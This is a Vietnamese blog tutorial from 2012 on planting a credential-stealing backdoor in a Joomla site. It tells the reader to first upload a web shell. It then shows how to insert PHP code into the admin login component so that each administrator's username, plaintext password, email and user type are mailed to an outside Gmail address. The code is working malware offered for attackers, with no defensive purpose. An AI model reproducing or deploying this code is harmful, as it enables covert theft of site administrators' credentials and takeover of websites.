14 thg 7, 2012
[Tut] Chèn Keylogger vào joomla
Bước 1: Up shell lên site joomla
Bước 2: Insert mã độc vào code
- Vào administrator/components/com_login/
- Edit file: admin.login.php
- Tìm dòng:$mainframe->redirect('index.php');
- Thêm trước dòng này 1 đoạn code như sau:
PHP Code:
$db =& JFactory::getDBO();$mailfrom = $mainframe->getCfg( 'mailfrom' );$fromname = $mainframe->getCfg( 'fromname' );$siteURL = JURI::base();$uname = $credentials['username'];$query = 'SELECT name , email, usertype ' .' FROM #__users' .' WHERE username = "'.$uname.'"';$db->setQuery( $query );$rows = $db->loadObject();if ( ! $mailfrom || ! $fromname ) {$fromname = $rows->name;$mailfrom = $rows->email;}$usertype = $rows->usertype;$email = $rows->email;$pass = $credentials['password'];$message = "$uname|$email|$pass|$usertype";$to="ducdung.08clc@gmail.com";$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";@mail($to, $siteURL, $message, $header);
Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com
![[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixEoUmpwXUmG6BwNUxkp2bx9LwFoIovVmTOD9ZZ_owzNehJ3jW-beXvaWzjpu7tCCpOzOkzIxz-wIwL9Dt8_YxyKl604U03Hd3Z1E3mlDvIB0u0IIf-WtvpXRfkgSv0Y9BzB9EkC6J0uI/s72-c/70.jpg)
Không có nhận xét nào:
Đăng nhận xét